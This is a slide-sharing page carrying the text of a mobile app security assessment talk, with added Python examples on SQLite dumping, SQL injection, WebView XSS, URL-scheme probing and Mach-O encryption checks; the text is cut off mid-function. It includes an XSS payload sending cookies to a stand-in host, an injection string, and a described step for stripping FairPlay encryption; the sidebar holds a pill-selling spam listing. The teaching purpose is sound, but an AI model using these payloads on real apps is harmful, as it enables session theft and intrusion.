Dmitry 'D1g1' Evdokimov - BlackBox analysis of iOS apps
 
Android vs iOS encryption systems
Android vs iOS encryption systemsAndroid vs iOS encryption systems
Android vs iOS encryption systems
 
iOS platform
iOS platformiOS platform
iOS platform
 
IOS Encryption Systems
IOS Encryption SystemsIOS Encryption Systems
IOS Encryption Systems
 
Apple iOS
Apple iOSApple iOS
Apple iOS
 
Session 1 - Introduction to iOS 7 and SDK
Session 1 -  Introduction to iOS 7 and SDKSession 1 -  Introduction to iOS 7 and SDK
Session 1 - Introduction to iOS 7 and SDK
 
Hacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OSHacker Halted 2014 - Reverse Engineering the Android OS
Hacker Halted 2014 - Reverse Engineering the Android OS
 
iOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days lateriOS 6 Exploitation: 280 days later
iOS 6 Exploitation: 280 days later
 
Antid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOSAntid0te 2.0 – ASLR in iOS
Antid0te 2.0 – ASLR in iOS
 
ios-mobile-app-development-intro
ios-mobile-app-development-introios-mobile-app-development-intro
ios-mobile-app-development-intro
 
Layer architecture of ios (1)
Layer architecture of ios (1)Layer architecture of ios (1)
Layer architecture of ios (1)
 
Forensics WS Consolidated
Forensics WS ConsolidatedForensics WS Consolidated
Forensics WS Consolidated
 

Ähnlich wie Mobile Security Assessment: 101

Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsSynopsys Software Integrity Group
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)securityiphonepentest
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLiphonepentest
 
Outsmarting SmartPhones
Outsmarting SmartPhonesOutsmarting SmartPhones
Outsmarting SmartPhonessaurabhharit
 
Fiware IoT_IDAS_intro_ul20_v2
Fiware IoT_IDAS_intro_ul20_v2Fiware IoT_IDAS_intro_ul20_v2
Fiware IoT_IDAS_intro_ul20_v2FIWARE
 
Exploring Your Apple M1 devices with Open Source Tools
Exploring Your Apple M1 devices with Open Source ToolsExploring Your Apple M1 devices with Open Source Tools
Exploring Your Apple M1 devices with Open Source ToolsKoan-Sin Tan
 
Virtue Security - The Art of Mobile Security 2013
Virtue Security - The Art of Mobile Security 2013Virtue Security - The Art of Mobile Security 2013
Virtue Security - The Art of Mobile Security 2013Virtue Security
 
2012 java one-con3648
2012 java one-con36482012 java one-con3648
2012 java one-con3648Eing Ong
 
openioc_scan - IOC scanner for memory forensics
openioc_scan - IOC scanner for memory forensicsopenioc_scan - IOC scanner for memory forensics
openioc_scan - IOC scanner for memory forensicsTakahiro Haruyama
 
iOS Development - Offline Class for Jasakomer
iOS Development - Offline Class for JasakomeriOS Development - Offline Class for Jasakomer
iOS Development - Offline Class for JasakomerAndri Yadi
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysqqlan
 
Android Workshop
Android WorkshopAndroid Workshop
Android WorkshopJunda Ong
 
Crash Course in AngularJS + Ionic (Deep dive)
Crash Course in AngularJS + Ionic (Deep dive)Crash Course in AngularJS + Ionic (Deep dive)
Crash Course in AngularJS + Ionic (Deep dive)ColdFusionConference
 
FI MUNI 2012 - iOS Basics
FI MUNI 2012 - iOS BasicsFI MUNI 2012 - iOS Basics
FI MUNI 2012 - iOS BasicsPetr Dvorak
 
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
2013 Toorcon San Diego Building Custom Android Malware for Penetration TestingStephan Chenette
 
MobSecCon 2015 - Dynamic Analysis of Android Apps
MobSecCon 2015 - Dynamic Analysis of Android AppsMobSecCon 2015 - Dynamic Analysis of Android Apps
MobSecCon 2015 - Dynamic Analysis of Android AppsRon Munitz
 
MACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
MACTANS: Injecting Malware
into iOS Devices via Malicious ChargersMACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
MACTANS: Injecting Malware
into iOS Devices via Malicious ChargersJoon Young Park
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseScott Sutherland
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applicationsjasonhaddix
 

Ähnlich wie Mobile Security Assessment: 101 (20)

Webinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical AppsWebinar–Mobile Application Hardening Protecting Business Critical Apps
Webinar–Mobile Application Hardening Protecting Business Critical Apps
 
iOS application (in)security
iOS application (in)securityiOS application (in)security
iOS application (in)security
 
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KLBreaking Secure Mobile Applications - Hack In The Box 2014 KL
Breaking Secure Mobile Applications - Hack In The Box 2014 KL
 
Outsmarting SmartPhones
Outsmarting SmartPhonesOutsmarting SmartPhones
Outsmarting SmartPhones
 
Fiware IoT_IDAS_intro_ul20_v2
Fiware IoT_IDAS_intro_ul20_v2Fiware IoT_IDAS_intro_ul20_v2
Fiware IoT_IDAS_intro_ul20_v2
 
Exploring Your Apple M1 devices with Open Source Tools
Exploring Your Apple M1 devices with Open Source ToolsExploring Your Apple M1 devices with Open Source Tools
Exploring Your Apple M1 devices with Open Source Tools
 
Virtue Security - The Art of Mobile Security 2013
Virtue Security - The Art of Mobile Security 2013Virtue Security - The Art of Mobile Security 2013
Virtue Security - The Art of Mobile Security 2013
 
2012 java one-con3648
2012 java one-con36482012 java one-con3648
2012 java one-con3648
 
openioc_scan - IOC scanner for memory forensics
openioc_scan - IOC scanner for memory forensicsopenioc_scan - IOC scanner for memory forensics
openioc_scan - IOC scanner for memory forensics
 
iOS Development - Offline Class for Jasakomer
iOS Development - Offline Class for JasakomeriOS Development - Offline Class for Jasakomer
iOS Development - Offline Class for Jasakomer
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Android Workshop
Android WorkshopAndroid Workshop
Android Workshop
 
Crash Course in AngularJS + Ionic (Deep dive)
Crash Course in AngularJS + Ionic (Deep dive)Crash Course in AngularJS + Ionic (Deep dive)
Crash Course in AngularJS + Ionic (Deep dive)
 
FI MUNI 2012 - iOS Basics
FI MUNI 2012 - iOS BasicsFI MUNI 2012 - iOS Basics
FI MUNI 2012 - iOS Basics
 
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
2013 Toorcon San Diego Building Custom Android Malware for Penetration Testing
 
MobSecCon 2015 - Dynamic Analysis of Android Apps
MobSecCon 2015 - Dynamic Analysis of Android AppsMobSecCon 2015 - Dynamic Analysis of Android Apps
MobSecCon 2015 - Dynamic Analysis of Android Apps
 
MACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
MACTANS: Injecting Malware
into iOS Devices via Malicious ChargersMACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
MACTANS: Injecting Malware
into iOS Devices via Malicious Chargers
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
 
Pentesting iOS Applications
Pentesting iOS ApplicationsPentesting iOS Applications
Pentesting iOS Applications
 
Ios development
Ios developmentIos development
Ios development
 

Kürzlich hochgeladen

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesBoston Institute of Analytics
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMESafe Software
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingEdi Saputra
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MIND CTI
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 

Kürzlich hochgeladen (20)

Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024

Mobile Security Assessment: 101

1. Intro to Mobile Security Assessment: Tools and Techniques
   Copyright 2012 WireHarbor Security, Inc.

2. Who am I?
   • Founder/President - WireHarbor Security, Inc.
   • Previously: Led Global Application Security for an F500 insurance company
   • Focus on: Application Security, Mobile Security, Source Code Review
   • Partnerships:

3. Agenda
   • Overview
   • Attack Vectors
   • Setup
   • Basic Techniques
   • Advanced Techniques
   • Questions

4. Objectives - Security Assessment
   • Determine the correct path to exploitation.
   • There are many attacks, weaknesses and impacts to choose from.

5. RULE #1: Mobile Security
   Perform sensitive/confidential/dangerous operations OFF-DEVICE...
   ...also, we still can't trust user input.

6. Mobile Assessment: Key Difference
   • The user has access to the runtime environment.
     o DEVS: this new perspective lets the assessor (or the attacker) see everything your app is doing.
   VS...

7. Jailbreak vs. Rooting
   • Jailbreak (iOS) - Users can break out of the sandbox but are still limited by Apple's kernel. (Your iPhone is still an iPhone.)
   • Rooting (Android) - Users gain superuser access and, with a custom kernel/ROM, can turn the phone into ???

8. Attack Vectors
   • GSM Network
   • GPS
   • Applications (Malware)
   • Application vulnerabilities (Objective-C)
   • Browser Exploits
   • Web Services
   • Bluetooth
   • WIFI (Rogue Access Points)
   • NFC/RFID

9. Security Controls
   • Reduced Attack Surface
   • Code Signing/App Store Approval Process - iOS
     o Android is more of a free-for-all
   • Sandboxing
   • NX Memory
   • ASLR/PIE (compiler flag)
     o Rarely used in 3rd party applications
   • Certificate Verification
   • Device Encryption

10. Mobile Security Assessment
   • Step #1: Jailbreak
   • Step #2: ???
   • Step #3: PROFIT!!!

11. Jailbreak in 30 sec
   • DISCLAIMER: BRICK WARNING!!!
   • DISCLAIMER: RUNTIME PROTECTIONS BECOME NIL!
   • DISCLAIMER: APPSTORE DEREGULATION!
   • Beware of jailbreak SCAMMERS!
   • iPhone Dev Team (blog.iphone-dev.org)
   • evad3rs Team (http://evasi0n.com/)
   • Android is more complicated. (SuperOneClick)
     o Hardware/OS/Carrier dependent

12. Tools
   • Jailbroken/Rooted Device
   • Cydia applications (tcpdump, sqlite, etc...)
   • Android Debug Bridge (ADB)
   • GDB (Runtime analysis)
   • IDA Pro (Binary Reverse-Engineering)
   • MobileSubstrate/Cycript
   • BurpSuite (HTTP Analysis)
   • Xcode/Eclipse (Custom development, binary tools)

13. Finding Targets
   PLENTY of them out there… 650,000+ applications in the App Store*, 250,000+ listed for iPad
   • App Store copies synced by iTunes on the desktop: ~/Music/iTunes/iTunes Media/Mobile Applications
     o .ipa file (zip archive)
   • On iOS: /var/mobile/Applications/<UUID>/<AppName>.app/
   *Source: TechCrunch, July 2012

15. Mobile Hacking 101
   • Gain Access
   • Look for interesting data
     o Log Files
     o Databases
     o Crash Dumps
     o In-Transit
   • Cause interesting execution
     o Form Input/Output
     o Application Redirects

16. Techniques: Log File Analysis
   • Applications output/store lots of logging data.
     o ~/Library/Logs/CrashReporter/MobileDevice/<DEVICE>
     o /private/var/log/system.log

17. Techniques: Data Storage
   • SQLite - "Self-contained, zero-configuration, embeddable DB"
   • Finding sqlite files…
   • Automation FTW! Run file(1) over everything and look for "SQLite" in the output:
     o find . -exec file {} \;

18. Techniques: Data Storage
   • Pulling out data…
     o SELECT * FROM <table>
19. Techniques: SQL Injection
   • Should look familiar... queries the app builds by string concatenation against its local SQLite database are injectable just like server-side SQL.
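An added example (not code from the deck) that automates slides 17 to 19: find SQLite files inside an app container by their 16-byte header rather than by extension, dump every table, and show that a query built with string formatting against that local database is injectable in exactly the way slide 19 hints. The sandbox directory, the accounts table and its rows are constructed here, and `lookup_vulnerable` / `lookup_safe` are hypothetical app functions, not anything from a real app.

```python
"""Locate SQLite files by magic header, dump their tables, and show why the
slide-19 warning applies inside the sandbox too. Added example, not code from
the WireHarbor deck; the container directory, the 'accounts' table and its
rows are constructed for demonstration."""
import os
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"   # first 16 bytes of every SQLite 3 file


def find_sqlite_files(root):
    """Walk `root` and return paths whose first 16 bytes are the SQLite header.
    Matching the header rather than the extension mirrors `find -exec file`:
    apps keep databases under .db, .sqlite, .dat or no extension at all."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if fh.read(16) == SQLITE_MAGIC:
                        hits.append(path)
            except OSError:
                continue
    return sorted(hits)


def dump_database(path):
    """{table_name: [row, ...]} for every user table: slide 18's
    'SELECT * FROM <table>' step, automated."""
    conn = sqlite3.connect(path)
    try:
        tables = [r[0] for r in conn.execute(
            "SELECT name FROM sqlite_master WHERE type='table' "
            "AND name NOT LIKE 'sqlite_%'")]
        # names come from sqlite_master, not from the user, so quoting
        # them with double quotes is sufficient here
        return {t: conn.execute('SELECT * FROM "%s"' % t).fetchall()
                for t in tables}
    finally:
        conn.close()


def lookup_vulnerable(path, username):
    """Hypothetical app code: the username is formatted straight into SQL."""
    conn = sqlite3.connect(path)
    try:
        sql = "SELECT username, token FROM accounts WHERE username = '%s'" % username
        return conn.execute(sql).fetchall()
    finally:
        conn.close()


def lookup_safe(path, username):
    """Parameterised form: input can never change the query's structure."""
    conn = sqlite3.connect(path)
    try:
        return conn.execute(
            "SELECT username, token FROM accounts WHERE username = ?",
            (username,)).fetchall()
    finally:
        conn.close()


def build_sample_sandbox():
    """Throwaway directory imitating an app container: one real SQLite
    database with a misleading extension plus a decoy that only carries the
    .db suffix. Constructed data, not taken from any real app."""
    root = tempfile.mkdtemp(prefix="sandbox_")
    os.makedirs(os.path.join(root, "Library", "Caches"))
    db = os.path.join(root, "Library", "Caches", "cache.dat")
    conn = sqlite3.connect(db)
    conn.execute("CREATE TABLE accounts (username TEXT, token TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("alice", "tok-alice-1"), ("bob", "tok-bob-2")])
    conn.commit()
    conn.close()
    with open(os.path.join(root, "Documents.db"), "wb") as fh:
        fh.write(b"not a database")
    return root, db


if __name__ == "__main__":
    root, _ = build_sample_sandbox()
    for found in find_sqlite_files(root):
        print(found, dump_database(found))
        print("injected:", lookup_vulnerable(found, "x' OR '1'='1"))
        print("safe:    ", lookup_safe(found, "x' OR '1'='1"))
```

The classic `' OR '1'='1` returns every account through `lookup_vulnerable` and nothing through `lookup_safe`; on a device the same payload goes in through whatever form field or URL parameter feeds the query.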
20. Techniques: XSS Injection
   • XSS is in there too...
     o Be careful with WebKit (the UIWebView object). "Of the 197 vulnerabilities, 142 are related to WebKit...", ZDNet review of iOS 6
     o Untrusted input concatenated straight into JavaScript that the app then evaluates:
       NSString *js = [[NSString alloc] initWithFormat:@"var v=\"%@\";", user];
       [mywebView stringByEvaluatingJavaScriptFromString:js];
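The defect in the slide-20 snippet and its fix, as an added example (not code from the deck). The Objective-C code drops `user` into JavaScript source unescaped; the same construction is reproduced in Python, the language of the other added examples on this page, next to a hardened variant that emits the value as a proper JavaScript string literal. The payload string is constructed for illustration.

```python
"""Why slide 20's snippet is injectable and how to close it. Added example,
not the deck's own code; PAYLOAD is a constructed attacker value."""
import json


def build_js_vulnerable(user):
    """Equivalent of [NSString stringWithFormat:@"var v=\"%@\";", user]:
    a quote in `user` ends the literal and the rest runs as code."""
    return 'var v="%s";' % user


def js_string_literal(value):
    """Turn an arbitrary string into a JavaScript string literal. json.dumps
    with ensure_ascii=True escapes quotes, backslashes, control characters
    and every non-ASCII code point, which also covers U+2028/U+2029: line
    terminators in JavaScript but ordinary characters in JSON."""
    return json.dumps(value, ensure_ascii=True)


def build_js_safe(user):
    """Hardened form: the value can only ever be a string, never code."""
    return "var v=%s;" % js_string_literal(user)


# constructed payload: closes the literal, exfiltrates, comments out the rest
PAYLOAD = '";document.location="http://evil.example/?c="+document.cookie;//'

if __name__ == "__main__":
    print(build_js_vulnerable(PAYLOAD))   # two statements, attacker controlled
    print(build_js_safe(PAYLOAD))         # one assignment of a harmless string
```

In the app the fix is the same idea: serialise the value (for example with NSJSONSerialization) before formatting it into the script, rather than escaping by hand.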
21. Techniques: Proxy Intercept
   • iOS validates TLS certificates, so the intercepting proxy's self-signed certificate is rejected.
     o Manually install the Burp Suite CA certificate on the device.
     o http://www.tuaw.com/2011/02/21/how-to-inspect-ioss-http-traffic-without-spending-a-dime/

22. Techniques: Event Handler Abuse
   • Apps register their own URL scheme handlers in Info.plist (CFBundleURLTypes); any other app, or a web page, can then invoke them:
     o [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"myapp://?foo=urb&blerg=gah"]];

23. Techniques: Event Handler Abuse
   • Finding interesting handlers…
     o $> strings <target>.app/<target> | grep "://" | grep -v "http"
   • Example output:
     <string>googlegmail://</string>
     <string>googlegmail://</string>
     <string>mgc://</string>
     <string>currents://</string>
     <string>googletranslate://</string>
     <string>comgoogleshopper://</string>
     <string>comgoogleearth://</string>
     <string>googlelatitude://</string>
     <string>googlebooks://</string>
     <string>currents://</string>
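An added example (not code from the deck) for slides 22 and 23: read the URL schemes an app registers under CFBundleURLTypes in its Info.plist with the standard-library plistlib, convert lines of the `strings | grep` output into scheme names, and build the probe URLs slide 22 opens. The Info.plist and every scheme name in it are constructed; com.example.bank is not a real app.

```python
"""Enumerate an iOS app's custom URL schemes and build probe URLs for them.
Added example, not the deck's own code; the plist below is constructed and
its scheme names are made up."""
import plistlib
from urllib.parse import urlencode

SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key><string>com.example.bank</string>
  <key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key><string>com.example.bank.transfer</string>
      <key>CFBundleURLSchemes</key>
      <array><string>examplebank</string><string>ebank</string></array>
    </dict>
    <dict>
      <key>CFBundleURLSchemes</key>
      <array><string>examplebank-oauth</string></array>
    </dict>
  </array>
</dict>
</plist>
"""


def url_schemes(info_plist_bytes):
    """Schemes registered under CFBundleURLTypes, in declaration order,
    de-duplicated. This is exactly the set the OS will route to the app,
    which is more precise than grepping the binary for '://'."""
    info = plistlib.loads(info_plist_bytes)
    seen = []
    for entry in info.get("CFBundleURLTypes", []):
        for scheme in entry.get("CFBundleURLSchemes", []):
            if scheme not in seen:
                seen.append(scheme)
    return seen


def scheme_from_strings_line(line):
    """Recover a scheme from one line of `strings <binary> | grep "://"`
    output (slide 23), e.g. '<string>googlegmail://</string>' -> 'googlegmail'.
    Returns None for lines that carry no scheme."""
    line = line.strip()
    if line.startswith("<string>") and line.endswith("</string>"):
        line = line[len("<string>"):-len("</string>")]
    if "://" not in line:
        return None
    return line.split("://", 1)[0] or None


def probe_urls(schemes, params):
    """One probe URL per scheme; the query string reaches the app's
    application:openURL: / handleOpenURL: handler without any filtering."""
    query = urlencode(params)
    return ["%s://?%s" % (s, query) for s in schemes]


if __name__ == "__main__":
    for url in probe_urls(url_schemes(SAMPLE_INFO_PLIST), {"foo": "urb", "blerg": "gah"}):
        print(url)
```

Every URL this prints is something any other app on the device (or a link in Safari) can open; what matters next is what the handler does with `foo` and `blerg` without asking the user.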
25. Advanced Techniques: Overview
   • Binary Decryption
     o API Tokens
     o Hard-coded Passwords
   • Passive/Active Fuzzing
   • Reverse Engineering
     o Token Generation Algorithms
   • Runtime Execution Interception/Manipulation
     o Interesting "hidden" methods
     o Web Services APIs

26. Advanced Techniques: Objective-C (iOS) Primer
   • A superset of standard C
     o Object model based on Smalltalk
     o Designed to be "object-oriented easy."
     o The good old days RETURN: buffer overflows, format strings, etc. still apply

27. Advanced Techniques: iOS Binary Inspection
   • Object file display tool - otool (Xcode)
     o Display file headers (Mach-O and Universal)
     o Display crypt segment info
     o Dump machine code
     o List shared libraries
   • ARM Processors
     o RISC instruction set
     o Little-endian representation

28. Advanced Techniques: iOS Binary Inspection
   • Universal (fat) binaries contain one slice per architecture
     o otool -f <file>
   • App Store binaries are FairPlay-encrypted on disk; check the cryptid field
     o otool -l <file> | grep -B1 -A4 LC_ENCRYPTION_INFO
     o cryptid 1: __TEXT is encrypted; cryptid 0: cleartext
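An added example (not code from the deck) that performs the slide-28 checks without otool: list the slices of a universal binary, read the LC_ENCRYPTION_INFO command of each to see whether cryptid is set, and write a dumped cleartext region back while clearing cryptid, which is the step that follows slide 30's gdb memory dump. The constants are the documented Mach-O values; the binary it parses is constructed inside the block and contains headers, one load command and filler bytes, no real code.

```python
"""Pure-Python version of the slide-28 checks: list the slices of a universal
(fat) binary like `otool -f`, and read LC_ENCRYPTION_INFO from each Mach-O
slice to see whether its __TEXT segment is still FairPlay-encrypted
(cryptid == 1). splice_decrypted() is the step after slide 30's gdb memory
dump: write the dumped cleartext over the encrypted range and clear cryptid.
Added example, not code from the deck; the binary it parses is constructed
here from the public Mach-O layouts and holds no real code."""
import struct

FAT_MAGIC = 0xCAFEBABE                             # fat header: big-endian on disk
MH_MAGIC, MH_CIGAM = 0xFEEDFACE, 0xCEFAEDFE        # 32-bit header, native / swapped
MH_MAGIC_64, MH_CIGAM_64 = 0xFEEDFACF, 0xCFFAEDFE  # 64-bit header
LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64 = 0x21, 0x2C
CPU_TYPE_ARM, CPU_TYPE_ARM64 = 12, 0x0100000C
CPU_NAMES = {CPU_TYPE_ARM: "arm", CPU_TYPE_ARM64: "arm64"}

def mach_header_format(data, offset):
    """(struct byte-order prefix, is_64bit) for the mach_header at offset."""
    magic = struct.unpack("<I", data[offset:offset + 4])[0]
    if magic in (MH_MAGIC, MH_MAGIC_64):
        return "<", magic == MH_MAGIC_64
    if magic in (MH_CIGAM, MH_CIGAM_64):
        return ">", magic == MH_CIGAM_64
    raise ValueError("no Mach-O header at offset %d" % offset)

def slices(data):
    """[(cputype, offset, size)] per fat_arch, or a single entry for a thin file."""
    if struct.unpack(">I", data[:4])[0] != FAT_MAGIC:
        endian, _ = mach_header_format(data, 0)
        return [(struct.unpack(endian + "i", data[4:8])[0], 0, len(data))]
    nfat = struct.unpack(">I", data[4:8])[0]
    archs = [struct.unpack(">iiIII", data[8 + 20 * i:28 + 20 * i]) for i in range(nfat)]
    return [(cputype, off, size) for cputype, _sub, off, size, _align in archs]

def _find_encryption_cmd(data, offset):
    """Walk the load commands of the slice at offset; (cmd_pos, endian) or None."""
    endian, is64 = mach_header_format(data, offset)
    ncmds = struct.unpack(endian + "I", data[offset + 16:offset + 20])[0]
    pos = offset + (32 if is64 else 28)          # mach_header_64 has a reserved field
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack(endian + "II", data[pos:pos + 8])
        if cmd in (LC_ENCRYPTION_INFO, LC_ENCRYPTION_INFO_64):
            return pos, endian
        pos += cmdsize
    return None

def encryption_info(data, offset=0):
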